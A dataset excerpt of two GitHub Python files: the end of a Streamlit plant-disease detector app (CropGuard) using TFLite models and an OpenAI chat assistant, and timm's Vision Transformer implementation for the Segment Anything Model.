'Potato___healthy'],\r\n 'Pepper Model': ['Pepper__bell___Bacterial_spot', 'Pepper__bell___healthy'],\r\n 'Tomato Model': [\r\n 'Tomato_Bacterial_spot',\r\n 'Tomato_Early_blight',\r\n 'Tomato_Late_blight',\r\n 'Tomato_Leaf_Mold',\r\n 'Tomato_Septoria_leaf_spot',\r\n 'Tomato_Spider_mites_Two_spotted_spider_mite',\r\n 'Tomato__Target_Spot',\r\n 'Tomato__Tomato_YellowLeaf__Curl_Virus',\r\n 'Tomato__Tomato_mosaic_virus',\r\n 'Tomato_healthy'\r\n ]\r\n}\r\n\r\n# Define model paths\r\nmodel_paths = {\r\n 'Potato Model': 'potato.tflite',\r\n 'Pepper Model': 'pepper.tflite',\r\n 'Tomato Model': 'tomato.tflite'\r\n}\r\n\r\n# Helper function for model inference\r\ndef preprocess_image(image, target_size=(224, 224)):\r\n image = image.resize(target_size)\r\n image = np.array(image)\r\n image = (image.astype('float32') / 255.0)\r\n return image\r\n\r\ndef predict(image, model, class_labels):\r\n image = preprocess_image(image)\r\n image = np.expand_dims(image, axis=0)\r\n\r\n model.set_tensor(model.get_input_details()[0]['index'], image)\r\n model.invoke()\r\n output = model.get_tensor(model.get_output_details()[0]['index'])\r\n predicted_class = class_labels[np.argmax(output)]\r\n return predicted_class\r\n\r\n# Set your OpenAI API key\r\nopenai.api_key = api_key\r\n\r\n\r\n# Create two columns\r\ncol1, col2 = st.columns(2)\r\n\r\n# Add content to the first column\r\nwith col1:\r\n 
st.title('CROPGUARD : Your Friendly Neighbourhood Plant Disease Detector ')\r\n# Add content to the second column\r\nwith col2:\r\n    st.image(\"855c4f3b09f2454eaebbb3baacb982b2.gif\", use_column_width=True)\r\nst.session_state.sidebar_state = 'expanded'\r\n# Streamlit app\r\n\r\nst.warning(\"Note: Only diseases listed in the class labels can be predicted, i.e. Potato Early Blight, Potato Late Blight, Bell Pepper bacterial spot, Tomato Bacterial Spot, Tomato Early Blight, Tomato Late Blight, Tomato Leaf Mold, Tomato Septoria Leaf Spot, Tomato Spider Mites Two spotted spider mites, Tomato target spot, Tomato yellow leaf curl virus, Tomato Mosaic virus.\")\r\n\r\n\r\n\r\n# User selects the model\r\nselected_model = st.selectbox('Select a Model', list(model_paths.keys()))\r\nst.session_state.selected_model = selected_model\r\n\r\n# Load the chosen model\r\nmodel_path = model_paths[selected_model]\r\nmodel = tf.lite.Interpreter(model_path=model_path)\r\nmodel.allocate_tensors()\r\n\r\nuploaded_image = st.file_uploader(\"Choose an image...\", type=[\"jpg\", \"png\", \"jpeg\"])\r\n\r\nif uploaded_image is not None:\r\n    st.image(uploaded_image, caption='Uploaded Image', use_column_width=True)\r\n    image = Image.open(uploaded_image)\r\n    predicted_class = predict(image, model, class_labels[selected_model])\r\n    prediction=predicted_class\r\n    if st.button('Detect'):\r\n        # Set the sidebar visibility to True when \"Detect\" is clicked\r\n        st.session_state.sidebar_state = 'expanded'\r\n        st.sidebar.title('Results')\r\n        st.sidebar.write(f'Predicted Class ({selected_model}): {predicted_class}')\r\n\r\n# Initialize conversation history file path\r\nconversation_history_file = \"conversation_history.txt\"\r\n\r\ntemplate = \"\"\"Given the plant disease, greet the user first and then write the cause, cure and symptoms of the plant disease.\r\nSpeak in a friendly way without unnecessary technical words.\r\nYour response:\"\"\"\r\nprompt = PromptTemplate.from_template(template)\r\n\r\n# State for controlling conversation\r\nif st.checkbox(\"Start Conversation\"):\r\n    st.session_state.sidebar_state = 'expanded'  # Initialize detected disease variable\r\n\r\n    st.sidebar.write(f\"Predicted Disease for the uploaded plant: {prediction}\")\r\n    with st.form(key='conversation_form'):\r\n        user_question = st.text_input(\"Ask a question about the disease or crop (type 'Disease {predicted_disease}'):\", key=\"my\")\r\n        submit_button = st.form_submit_button(\"Submit\")\r\n\r\n    # Define ChatOpenAI agent for question-answering\r\n    llm = ChatOpenAI(openai_api_key=openai.api_key, temperature=0.7)  # Adjust the temperature as needed\r\n    tools = load_tools(['wikipedia', 'wolfram-alpha'], llm=llm)\r\n    memory = ConversationBufferMemory(memory_key=\"chat_history\", return_messages=True)\r\n\r\n    # Define Agent\r\n    agent = initialize_agent(tools, llm, agent=AgentType.CONVERSATIONAL_REACT_DESCRIPTION,\r\n                             verbose=True, memory=memory, max_iterations=6 )\r\n\r\n    if user_question:\r\n        try:\r\n            if submit_button:\r\n                # Retrieve answer using ChatOpenAI based on the conversation history\r\n                \r\n                # Create a list of messages for the conversation\r\n                messages = [ {\"role\": \"system\", \"content\": \"You are a conversational agent. You give information on the cause, cure and symptoms of the plant disease.\"}, {\"role\": \"user\", \"content\": user_question}\r\n                ]\r\n\r\n                try:\r\n                    # Use OpenAI's Chat API to get a response\r\n                    response = openai.ChatCompletion.create(\r\n                        model=\"gpt-3.5-turbo\",\r\n                        messages=messages\r\n                    )\r\n\r\n                    # Extract the assistant's reply\r\n                    assistant_response = response['choices'][0]['message']['content']\r\n\r\n                    # Print the assistant's response\r\n                    st.write(\"CropGuard :\")\r\n                    st.write(assistant_response)\r\n                    print(assistant_response)\r\n\r\n                    # Save the conversation history\r\n                    conversation_memory.append({\"role\": \"user\", \"content\": user_question})\r\n                    conversation_memory.append({\"role\": \"assistant\", \"content\": assistant_response})\r\n\r\n                    # Check if the conversation history file exists\r\n                    if os.path.exists(conversation_history_file):\r\n                        # Append the conversation to the existing file\r\n                        with open(conversation_history_file, \"a\") as file:\r\n                            for item in conversation_memory:\r\n                                file.write(f\"{item['role']}: {item['content']}\\n\")\r\n                    else:\r\n                        # Create a new file and write the conversation history to it\r\n                        with open(conversation_history_file, \"w\") as file:\r\n                            for item in conversation_memory:\r\n                                file.write(f\"{item['role']}: {item['content']}\\n\")\r\n\r\n\r\n                except Exception as e:\r\n                    # Handle exceptions\r\n                    if \"Could not parse LLM output:\" in str(e):\r\n                        info = str(e).removeprefix(\"Could not parse LLM output: `\").removesuffix(\"`\")\r\n                    else:\r\n                        raise Exception(str(e))\r\n                    st.error(f\"An error occurred: {info}\")\r\n\r\n\r\n        except Exception as e:\r\n            raise Exception(str(e))\r\n\r\nwith st.sidebar.expander(\"About CropGuard\"):\r\n    st.title(\"About CropGuard\")\r\n    st.write(\"CropGuard is your friendly neighborhood plant disease detector.\")\r\n    st.write(\"It uses machine learning models to identify diseases in plants, such as potatoes, peppers, and tomatoes.\")\r\n    st.write(\"Simply upload an image of a plant, and CropGuard will predict the disease it might have.\")\r\n    st.write(\"Additionally, you can have a conversation with CropGuard to learn more about the disease, its causes, cures, and symptoms.\")\r\n    st.write(\"CropGuard is designed to provide information in a friendly and understandable way.\")\r\n    st.write(\"If you have any questions or feedback, please feel free to reach out to us.\")\r\n    st.write(\"Thank you for using CropGuard!\")\r\n\r\n# Add a button to download the conversation history file\r\nif st.sidebar.button(\"Download Conversation History\"):\r\n    with open(conversation_history_file, \"r\") as file:\r\n        history_text = file.read()\r\n    st.download_button(\r\n        label=\"Click to Download Conversation History\",\r\n        data=history_text,\r\n        key=\"download_conversation_history\",\r\n        file_name=\"conversation_history.txt\",\r\n    )\r\n\r\n    \r\n\r\n","repo_name":"manasvimishra11/CropGuard","sub_path":"newapp.py","file_name":"newapp.py","file_ext":"py","file_size_in_byte":10143,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"76"}
{"seq_id":"2757494061","text":"\"\"\" Vision Transformer (ViT) in PyTorch\n\nA PyTorch implement of Vision Transformers as described in:\n\n'Exploring Plain Vision Transformer Backbones for Object Detection'\n    - https://arxiv.org/abs/2203.16527\n\n'Segment Anything Model (SAM)'\n    - https://github.com/facebookresearch/segment-anything/\n\n\"\"\"\nimport logging\nfrom functools import partial\nfrom typing import Callable, 
Optional, Tuple\n\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport torch.utils.checkpoint\nfrom torch.jit import Final\n\nfrom timm.data import IMAGENET_DEFAULT_MEAN, IMAGENET_DEFAULT_STD, IMAGENET_INCEPTION_MEAN, IMAGENET_INCEPTION_STD\nfrom timm.layers import PatchEmbed, Mlp, DropPath, PatchDropout, LayerNorm2d, ClassifierHead, NormMlpClassifierHead,\\\n Format, resample_abs_pos_embed_nhwc, RotaryEmbeddingCat, apply_rot_embed_cat, to_2tuple, use_fused_attn\nfrom ._builder import build_model_with_cfg\nfrom ._manipulate import checkpoint_seq\nfrom ._registry import generate_default_cfgs, register_model\nfrom ._features_fx import register_notrace_function\n\n# model_registry will add each entrypoint fn to this\n__all__ = ['VisionTransformerSAM']\n\n\n_logger = logging.getLogger(__name__)\n\n\ndef get_rel_pos(q_size: int, k_size: int, rel_pos: torch.Tensor) -> torch.Tensor:\n \"\"\"\n Get relative positional embeddings according to the relative positions of\n query and key sizes.\n Args:\n q_size (int): size of query q.\n k_size (int): size of key k.\n rel_pos (Tensor): relative position embeddings (L, C).\n\n Returns:\n Extracted positional embeddings according to relative positions.\n \"\"\"\n max_rel_dist = int(2 * max(q_size, k_size) - 1)\n # Interpolate rel pos if needed.\n if rel_pos.shape[0] != max_rel_dist:\n # Interpolate rel pos.\n rel_pos_resized = F.interpolate(\n rel_pos.reshape(1, rel_pos.shape[0], -1).permute(0, 2, 1),\n size=max_rel_dist,\n mode=\"linear\",\n )\n rel_pos_resized = rel_pos_resized.reshape(-1, max_rel_dist).permute(1, 0)\n else:\n rel_pos_resized = rel_pos\n\n # Scale the coords with short length if shapes for q and k are different.\n q_coords = torch.arange(q_size)[:, None] * max(k_size / q_size, 1.0)\n k_coords = torch.arange(k_size)[None, :] * max(q_size / k_size, 1.0)\n relative_coords = (q_coords - k_coords) + (k_size - 1) * max(q_size / k_size, 1.0)\n\n return rel_pos_resized[relative_coords.long()]\n\nregister_notrace_function(get_rel_pos)\n\n\ndef get_decomposed_rel_pos_bias(\n q: torch.Tensor,\n rel_pos_h: torch.Tensor,\n rel_pos_w: torch.Tensor,\n q_size: Tuple[int, int],\n k_size: Tuple[int, int],\n) -> torch.Tensor:\n \"\"\"\n Calculate decomposed Relative Positional Embeddings from :paper:`mvitv2`.\n https://github.com/facebookresearch/mvit/blob/19786631e330df9f3622e5402b4a419a263a2c80/mvit/models/attention.py\n Args:\n q (Tensor): query q in the attention layer with shape (B, q_h * q_w, C).\n rel_pos_h (Tensor): relative position embeddings (Lh, C) for height axis.\n rel_pos_w (Tensor): relative position embeddings (Lw, C) for width axis.\n q_size (Tuple): spatial sequence size of query q with (q_h, q_w).\n k_size (Tuple): spatial sequence size of key k with (k_h, k_w).\n\n Returns:\n bias (Tensor): attention bias to add to attention map\n \"\"\"\n q_h, q_w = q_size\n k_h, k_w = k_size\n Rh = get_rel_pos(q_h, k_h, rel_pos_h)\n Rw = get_rel_pos(q_w, k_w, rel_pos_w)\n\n B, _, dim = q.shape\n r_q = q.reshape(B, q_h, q_w, dim)\n rel_h = torch.einsum(\"bhwc,hkc->bhwk\", r_q, Rh)\n rel_w = torch.einsum(\"bhwc,wkc->bhwk\", r_q, Rw)\n\n attn_bias = rel_h[:, :, :, :, None] + rel_w[:, :, :, None, :]\n return attn_bias.reshape(-1, q_h * q_w, k_h * k_w)\n\n\nclass Attention(nn.Module):\n fused_attn: Final[bool]\n\n def __init__(\n self,\n dim,\n num_heads=8,\n qkv_bias=True,\n qk_norm=False,\n attn_drop=0.,\n proj_drop=0.,\n norm_layer=nn.LayerNorm,\n use_rel_pos: bool = False,\n input_size: Optional[Tuple[int, int]] = None,\n 
rope: Optional[nn.Module] = None,\n ):\n super().__init__()\n assert dim % num_heads == 0, 'dim should be divisible by num_heads'\n self.num_heads = num_heads\n self.head_dim = dim // num_heads\n self.scale = self.head_dim ** -0.5\n self.fused_attn = use_fused_attn()\n\n self.qkv = nn.Linear(dim, dim * 3, bias=qkv_bias)\n self.q_norm = norm_layer(self.head_dim) if qk_norm else nn.Identity()\n self.k_norm = norm_layer(self.head_dim) if qk_norm else nn.Identity()\n self.attn_drop = nn.Dropout(attn_drop)\n self.proj = nn.Linear(dim, dim)\n self.proj_drop = nn.Dropout(proj_drop)\n self.use_rel_pos = use_rel_pos\n if self.use_rel_pos:\n assert rope is None\n assert (\n input_size is not None\n ), \"Input size must be provided if using relative positional encoding.\"\n # initialize relative positional embeddings\n self.rel_pos_h = nn.Parameter(torch.zeros(\n 2 * input_size[0] - 1, self.head_dim))\n self.rel_pos_w = nn.Parameter(torch.zeros(\n 2 * input_size[1] - 1, self.head_dim))\n self.rope = rope\n\n def forward(self, x):\n B, H, W, _ = x.shape\n N = H * W\n x = x.reshape(B, N, -1)\n qkv = self.qkv(x).view(B, N, 3, self.num_heads, -1).permute(2, 0, 3, 1, 4)\n # qkv with shape (3, B, nHead, H * W, C)\n q, k, v = qkv.reshape(3, B * self.num_heads, N, -1).unbind(0)\n # q, k, v with shape (B * nHead, H * W, C)\n q, k = self.q_norm(q), self.k_norm(k)\n\n if self.use_rel_pos:\n attn_bias = get_decomposed_rel_pos_bias(q, self.rel_pos_h, self.rel_pos_w, (H, W), (H, W))\n else:\n attn_bias = None\n if self.rope is not None:\n rope = self.rope.get_embed()\n q = apply_rot_embed_cat(q, rope).type_as(v)\n k = apply_rot_embed_cat(k, rope).type_as(v)\n\n if self.fused_attn:\n x = torch.nn.functional.scaled_dot_product_attention(\n q, k, v,\n attn_mask=attn_bias,\n dropout_p=self.attn_drop.p if self.training else 0.,\n )\n else:\n q = q * self.scale\n attn = q @ k.transpose(-2, -1)\n if attn_bias is not None:\n attn = attn + attn_bias\n attn = attn.softmax(dim=-1)\n attn = self.attn_drop(attn)\n x = attn @ v\n\n x = x.view(B, self.num_heads, N, -1).transpose(1, 2).reshape(B, N, -1)\n x = self.proj(x)\n x = x.view(B, H, W, -1)\n return x\n\n\nclass LayerScale(nn.Module):\n def __init__(self, dim, init_values=1e-5, inplace=False):\n super().__init__()\n self.inplace = inplace\n self.gamma = nn.Parameter(init_values * torch.ones(dim))\n\n def forward(self, x):\n return x.mul_(self.gamma) if self.inplace else x * self.gamma\n\n\nclass Block(nn.Module):\n\n def __init__(\n self,\n dim,\n num_heads,\n mlp_ratio=4.,\n qkv_bias=True,\n qk_norm=False,\n proj_drop=0.,\n attn_drop=0.,\n init_values=None,\n drop_path=0.,\n act_layer=nn.GELU,\n norm_layer=nn.LayerNorm,\n mlp_layer=Mlp,\n use_rel_pos=False,\n window_size=0,\n input_size=None,\n rope=None,\n ):\n super().__init__()\n self.window_size = window_size\n self.norm1 = norm_layer(dim)\n self.attn = Attention(\n dim,\n num_heads=num_heads,\n qkv_bias=qkv_bias,\n qk_norm=qk_norm,\n attn_drop=attn_drop,\n proj_drop=proj_drop,\n norm_layer=norm_layer,\n use_rel_pos=use_rel_pos,\n input_size=input_size if window_size == 0 else (window_size, window_size),\n rope=rope,\n )\n self.ls1 = LayerScale(dim, init_values=init_values) if init_values else nn.Identity()\n self.drop_path1 = DropPath(drop_path) if drop_path > 0. 
else nn.Identity()\n\n self.norm2 = norm_layer(dim)\n self.mlp = mlp_layer(\n in_features=dim,\n hidden_features=int(dim * mlp_ratio),\n act_layer=act_layer,\n drop=proj_drop,\n )\n self.ls2 = LayerScale(dim, init_values=init_values) if init_values else nn.Identity()\n self.drop_path2 = DropPath(drop_path) if drop_path > 0. else nn.Identity()\n\n def forward(self, x):\n B, H, W, _ = x.shape\n\n shortcut = x\n x = self.norm1(x)\n # Window partition\n pad_hw: Optional[Tuple[int, int]] = None\n if self.window_size > 0:\n x, pad_hw = window_partition(x, self.window_size)\n\n x = self.drop_path1(self.ls1(self.attn(x)))\n\n # Reverse window partition\n if self.window_size > 0:\n x = window_unpartition(x, self.window_size, (H, W), pad_hw)\n\n x = shortcut + x\n\n x = x.reshape(B, H * W, -1) # MLP is faster for N, L, C tensor\n x = x + self.drop_path2(self.ls2(self.mlp(self.norm2(x))))\n x = x.reshape(B, H, W, -1)\n\n return x\n\n\ndef window_partition(x: torch.Tensor, window_size: int) -> Tuple[torch.Tensor, Tuple[int, int]]:\n \"\"\"\n Partition into non-overlapping windows with padding if needed.\n Args:\n x (tensor): input tokens with [B, H, W, C].\n window_size (int): window size.\n\n Returns:\n windows: windows after partition with [B * num_windows, window_size, window_size, C].\n (Hp, Wp): padded height and width before partition\n \"\"\"\n B, H, W, C = x.shape\n\n pad_h = (window_size - H % window_size) % window_size\n pad_w = (window_size - W % window_size) % window_size\n x = F.pad(x, (0, 0, 0, pad_w, 0, pad_h))\n Hp, Wp = H + pad_h, W + pad_w\n\n x = x.view(B, Hp // window_size, window_size, Wp // window_size, window_size, C)\n windows = x.permute(0, 1, 3, 2, 4, 5).contiguous().view(-1, window_size, window_size, C)\n return windows, (Hp, Wp)\n\n\ndef window_unpartition(\n windows: torch.Tensor, window_size: int, hw: Tuple[int, int], pad_hw: Optional[Tuple[int, int]] = None,\n) -> torch.Tensor:\n \"\"\"\n Window unpartition into original sequences and removing padding.\n Args:\n windows (tensor): input tokens with [B * num_windows, window_size, window_size, C].\n window_size (int): window size.\n pad_hw (Tuple): padded height and width (Hp, Wp).\n hw (Tuple): original height and width (H, W) before padding.\n\n Returns:\n x: unpartitioned sequences with [B, H, W, C].\n \"\"\"\n Hp, Wp = pad_hw if pad_hw is not None else hw\n H, W = hw\n B = windows.shape[0] // (Hp * Wp // window_size // window_size)\n x = windows.view(B, Hp // window_size, Wp // window_size, window_size, window_size, -1)\n x = x.permute(0, 1, 3, 2, 4, 5).contiguous().view(B, Hp, Wp, -1)\n x = x[:, :H, :W, :].contiguous()\n return x\n\n\nclass VisionTransformerSAM(nn.Module):\n \"\"\" Vision Transformer for Segment-Anything Model(SAM)\n\n A PyTorch impl of : `Exploring Plain Vision Transformer Backbones for Object Detection` or `Segment Anything Model (SAM)`\n - https://arxiv.org/abs/2010.11929\n \"\"\"\n\n def __init__(\n self,\n img_size: int = 1024,\n patch_size: int = 16,\n in_chans: int = 3,\n num_classes: int = 768,\n embed_dim: int = 768,\n depth: int = 12,\n num_heads: int = 12,\n mlp_ratio: float = 4.,\n qkv_bias: bool = True,\n qk_norm: bool = False,\n init_values: Optional[float] = None,\n pre_norm: bool = False,\n drop_rate: float = 0.,\n pos_drop_rate: float = 0.,\n patch_drop_rate: float = 0.,\n proj_drop_rate: float = 0.,\n attn_drop_rate: float = 0.,\n drop_path_rate: float = 0.,\n weight_init: str = '',\n embed_layer: Callable = partial(\n PatchEmbed, output_fmt=Format.NHWC, strict_img_size=False),\n 
norm_layer: Optional[Callable] = nn.LayerNorm,\n            act_layer: Optional[Callable] = nn.GELU,\n            block_fn: Callable = Block,\n            mlp_layer: Callable = Mlp,\n            use_abs_pos: bool = True,\n            use_rel_pos: bool = False,\n            use_rope: bool = False,\n            window_size: int = 14,\n            global_attn_indexes: Tuple[int, ...] = (),\n            neck_chans: int = 256,\n            global_pool: str = 'avg',\n            head_hidden_size: Optional[int] = None,\n            ref_feat_shape: Optional[Tuple[Tuple[int, int], Tuple[int, int]]] = None\n    ):\n        \"\"\"\n        Args:\n            img_size: Input image size.\n            patch_size: Patch size.\n            in_chans: Number of image input channels.\n            num_classes: Number of classes for classification head.\n            global_pool: Type of global pooling for final sequence (default: 'token').\n            embed_dim: Transformer embedding dimension.\n            depth: Depth of transformer.\n            num_heads: Number of attention heads.\n            mlp_ratio: Ratio of mlp hidden dim to embedding dim.\n            qkv_bias: Enable bias for qkv projections if True.\n            init_values: Layer-scale init values (layer-scale enabled if not None).\n            drop_rate: Head dropout rate.\n            pos_drop_rate: Position embedding dropout rate.\n            attn_drop_rate: Attention dropout rate.\n            drop_path_rate: Stochastic depth rate.\n            weight_init: Weight initialization scheme.\n            embed_layer: Patch embedding layer.\n            norm_layer: Normalization layer.\n            act_layer: MLP activation layer.\n            block_fn: Transformer block layer.\n            use_abs_pos: If True, use absolute positional embeddings.\n            use_rel_pos: If True, add relative positional embeddings to the attention map.\n            use_rope: If True, add rotary position embeddings to q/k in attention block.\n            window_size: Window size for window attention blocks. If 0, window attention is not used.\n            global_attn_indexes: Indexes for blocks using global attention. Used when window_size > 0.\n            global_pool: Global pooling type.\n            head_hidden_size: If set, use NormMlpHead\n            ref_feat_shape: Tuple of reference feature shapes for ROPE, (global, local)\n        \"\"\"\n        super().__init__()\n        norm_layer = norm_layer or partial(nn.LayerNorm, eps=1e-6)\n        act_layer = act_layer or nn.GELU\n\n        self.num_classes = num_classes\n        self.global_pool = global_pool\n        # num_features for consistency with other models\n        self.num_features = self.embed_dim = embed_dim\n        self.grad_checkpointing = False\n\n        self.patch_embed = embed_layer(\n            img_size=img_size,\n            patch_size=patch_size,\n            in_chans=in_chans,\n            embed_dim=embed_dim,\n            bias=not pre_norm,  # disable bias if pre-norm is used\n        )\n        grid_size = self.patch_embed.grid_size\n        if use_abs_pos:\n            # Initialize absolute positional embedding with pretrain image size.\n            self.pos_embed = nn.Parameter(torch.zeros(1, grid_size[0], grid_size[1], embed_dim))\n        else:\n            self.pos_embed = None\n        self.pos_drop = nn.Dropout(p=pos_drop_rate)\n        if patch_drop_rate > 0:\n            self.patch_drop = PatchDropout(\n                patch_drop_rate,\n                num_prefix_tokens=0,\n            )\n        else:\n            self.patch_drop = nn.Identity()\n        self.norm_pre = norm_layer(embed_dim) if pre_norm else nn.Identity()\n\n        if use_rope:\n            assert not use_rel_pos, \"ROPE and relative pos embeddings should not be enabled at same time\"\n            if ref_feat_shape is not None:\n                assert len(ref_feat_shape) == 2\n                ref_feat_shape_global = to_2tuple(ref_feat_shape[0])\n                ref_feat_shape_window = to_2tuple(ref_feat_shape[1])\n            else:\n                ref_feat_shape_global = ref_feat_shape_window = None\n            self.rope_global = RotaryEmbeddingCat(\n                embed_dim // num_heads,\n                in_pixels=False,\n                feat_shape=grid_size,\n                ref_feat_shape=ref_feat_shape_global,\n            )\n            self.rope_window = RotaryEmbeddingCat(\n                embed_dim // num_heads,\n                
in_pixels=False,\n feat_shape=to_2tuple(window_size),\n ref_feat_shape=ref_feat_shape_window,\n )\n else:\n self.rope_global = None\n self.rope_window = None\n\n # stochastic depth decay rule\n dpr = [x.item() for x in torch.linspace(0, drop_path_rate, depth)]\n self.blocks = nn.Sequential(*[\n block_fn(\n dim=embed_dim,\n num_heads=num_heads,\n mlp_ratio=mlp_ratio,\n qkv_bias=qkv_bias,\n qk_norm=qk_norm,\n init_values=init_values,\n proj_drop=proj_drop_rate,\n attn_drop=attn_drop_rate,\n drop_path=dpr[i],\n norm_layer=norm_layer,\n act_layer=act_layer,\n mlp_layer=mlp_layer,\n use_rel_pos=use_rel_pos,\n window_size=window_size if i not in global_attn_indexes else 0,\n input_size=grid_size,\n rope=self.rope_window if i not in global_attn_indexes else self.rope_global,\n )\n for i in range(depth)])\n\n if neck_chans:\n self.neck = nn.Sequential(\n nn.Conv2d(\n embed_dim,\n neck_chans,\n kernel_size=1,\n bias=False,\n ),\n LayerNorm2d(neck_chans),\n nn.Conv2d(\n neck_chans,\n neck_chans,\n kernel_size=3,\n padding=1,\n bias=False,\n ),\n LayerNorm2d(neck_chans),\n )\n self.num_features = neck_chans\n else:\n if head_hidden_size:\n self.neck = nn.Identity()\n else:\n # should have a final norm with standard ClassifierHead\n self.neck = LayerNorm2d(embed_dim)\n neck_chans = embed_dim\n\n # Classifier Head\n if head_hidden_size:\n self.head = NormMlpClassifierHead(\n neck_chans,\n num_classes,\n hidden_size=head_hidden_size,\n pool_type=global_pool,\n drop_rate=drop_rate,\n )\n else:\n self.head = ClassifierHead(\n neck_chans,\n num_classes,\n pool_type=global_pool,\n drop_rate=drop_rate,\n )\n\n @torch.jit.ignore\n def no_weight_decay(self):\n return {'pos_embed', 'dist_token'}\n\n @torch.jit.ignore\n def group_matcher(self, coarse=False):\n return dict(\n stem=r'^pos_embed|patch_embed', # stem and embed\n blocks=[(r'^blocks\\.(\\d+)', None), (r'^norm', (99999,))]\n )\n\n @torch.jit.ignore\n def set_grad_checkpointing(self, enable=True):\n self.grad_checkpointing = enable\n\n @torch.jit.ignore\n def get_classifier(self):\n return self.head\n\n def reset_classifier(self, num_classes=0, global_pool=None):\n self.head.reset(num_classes, global_pool)\n\n def forward_features(self, x):\n x = self.patch_embed(x)\n if self.pos_embed is not None:\n # dynamically resize abs pos embedding if needed\n x = x + resample_abs_pos_embed_nhwc(self.pos_embed, x.shape[1:3])\n x = self.pos_drop(x)\n x = self.patch_drop(x)\n x = self.norm_pre(x)\n if self.grad_checkpointing and not torch.jit.is_scripting():\n x = checkpoint_seq(self.blocks, x)\n else:\n x = self.blocks(x)\n x = self.neck(x.permute(0, 3, 1, 2))\n return x\n\n def forward_head(self, x, pre_logits: bool = False):\n return self.head(x, pre_logits=True) if pre_logits else self.head(x)\n\n def forward(self, x):\n x = self.forward_features(x)\n x = self.forward_head(x)\n return x\n\n\ndef checkpoint_filter_fn(\n state_dict,\n model,\n):\n \"\"\" Remap SAM checkpoints -> timm \"\"\"\n sam_checkpoint = 'image_encoder.patch_embed.proj.weight' in state_dict\n out_dict = {}\n for k, v in state_dict.items():\n if k.startswith('image_encoder.'):\n k = k[14:]\n k = k.replace('mlp.lin', 'mlp.fc')\n else:\n if sam_checkpoint:\n continue\n out_dict[k] = v\n return out_dict\n\n\ndef _cfg(url='', **kwargs):\n return {\n 'url': url,\n 'num_classes': 1000, 'input_size': (3, 1024, 1024), 'pool_size': None,\n 'crop_pct': .9, 'interpolation': 'bicubic', 'fixed_input_size': True,\n 'mean': IMAGENET_INCEPTION_MEAN, 'std': IMAGENET_INCEPTION_STD,\n 'first_conv': 
'patch_embed.proj', 'classifier': 'head.fc',\n        **kwargs\n    }\n\n\ndefault_cfgs = generate_default_cfgs({\n\n    # Segment-Anything Model (SAM) pretrained - https://github.com/facebookresearch/segment-anything (no classifier head, for fine-tune/features only)\n    'samvit_base_patch16.sa1b': _cfg(\n        url='https://dl.fbaipublicfiles.com/segment_anything/sam_vit_b_01ec64.pth',\n        hf_hub_id='timm/',\n        license='apache-2.0',\n        mean=IMAGENET_DEFAULT_MEAN, std=IMAGENET_DEFAULT_STD, num_classes=0,\n        input_size=(3, 1024, 1024), crop_pct=1.0),\n    'samvit_large_patch16.sa1b': _cfg(\n        url='https://dl.fbaipublicfiles.com/segment_anything/sam_vit_l_0b3195.pth',\n        hf_hub_id='timm/',\n        license='apache-2.0',\n        mean=IMAGENET_DEFAULT_MEAN, std=IMAGENET_DEFAULT_STD, num_classes=0,\n        input_size=(3, 1024, 1024), crop_pct=1.0),\n    'samvit_huge_patch16.sa1b': _cfg(\n        url='https://dl.fbaipublicfiles.com/segment_anything/sam_vit_h_4b8939.pth',\n        hf_hub_id='timm/',\n        license='apache-2.0',\n        mean=IMAGENET_DEFAULT_MEAN, std=IMAGENET_DEFAULT_STD, num_classes=0,\n        input_size=(3, 1024, 1024), crop_pct=1.0),\n\n    'samvit_base_patch16_224': _cfg(\n        mean=IMAGENET_DEFAULT_MEAN, std=IMAGENET_DEFAULT_STD, num_classes=1000,\n        input_size=(3, 224, 224), crop_pct=0.9),\n})\n\n\ndef _create_vision_transformer(variant, pretrained=False, **kwargs):\n    if kwargs.get('features_only', None):\n        raise RuntimeError(\n            'features_only not implemented for Vision Transformer models.')\n\n    return build_model_with_cfg(\n        VisionTransformerSAM,\n        variant,\n        pretrained,\n        pretrained_filter_fn=checkpoint_filter_fn,\n        **kwargs,\n    )\n\n\n@register_model\ndef samvit_base_patch16(pretrained=False, **kwargs) -> VisionTransformerSAM:\n    \"\"\" ViT-B/16 for Segment-Anything\n    \"\"\"\n    model_args = dict(\n        patch_size=16, embed_dim=768, depth=12, num_heads=12, global_attn_indexes=[2, 5, 8, 11],\n        window_size=14, use_rel_pos=True, img_size=1024,\n    )\n    model = _create_vision_transformer(\n        'samvit_base_patch16', pretrained=pretrained, **dict(model_args, **kwargs))\n    return model\n\n\n@register_model\ndef samvit_large_patch16(pretrained=False, **kwargs) -> VisionTransformerSAM:\n    \"\"\" ViT-L/16 for Segment-Anything\n    \"\"\"\n    model_args = dict(\n        patch_size=16, embed_dim=1024, depth=24, num_heads=16, global_attn_indexes=[5, 11, 17, 23],\n        window_size=14, use_rel_pos=True, img_size=1024,\n    )\n    model = _create_vision_transformer(\n        'samvit_large_patch16', pretrained=pretrained, **dict(model_args, **kwargs))\n    return model\n\n\n@register_model\ndef samvit_huge_patch16(pretrained=False, **kwargs) -> VisionTransformerSAM:\n    \"\"\" ViT-H/16 for Segment-Anything\n    \"\"\"\n    model_args = dict(\n        patch_size=16, embed_dim=1280, depth=32, num_heads=16, global_attn_indexes=[7, 15, 23, 31],\n        window_size=14, use_rel_pos=True, img_size=1024,\n    )\n    model = _create_vision_transformer(\n        'samvit_huge_patch16', pretrained=pretrained, **dict(model_args, **kwargs))\n    return model\n\n\n@register_model\ndef samvit_base_patch16_224(pretrained=False, **kwargs) -> VisionTransformerSAM:\n    \"\"\" ViT-B/16 based on samvit arch\n    \"\"\"\n    model_args = dict(\n        patch_size=16, embed_dim=768, depth=12, num_heads=12, global_attn_indexes=[2, 5, 8, 11],\n        window_size=14, use_rel_pos=True, use_abs_pos=False, img_size=224, neck_chans=None,\n    )\n    model = _create_vision_transformer(\n        'samvit_base_patch16_224', pretrained=pretrained, **dict(model_args, **kwargs))\n    return 
model\n\n","repo_name":"huggingface/pytorch-image-models","sub_path":"timm/models/vision_transformer_sam.py","file_name":"vision_transformer_sam.py","file_ext":"py","file_size_in_byte":25122,"program_lang":"python","lang":"en","doc_type":"code","stars":27689,"dataset":"github-code","pt":"76"}
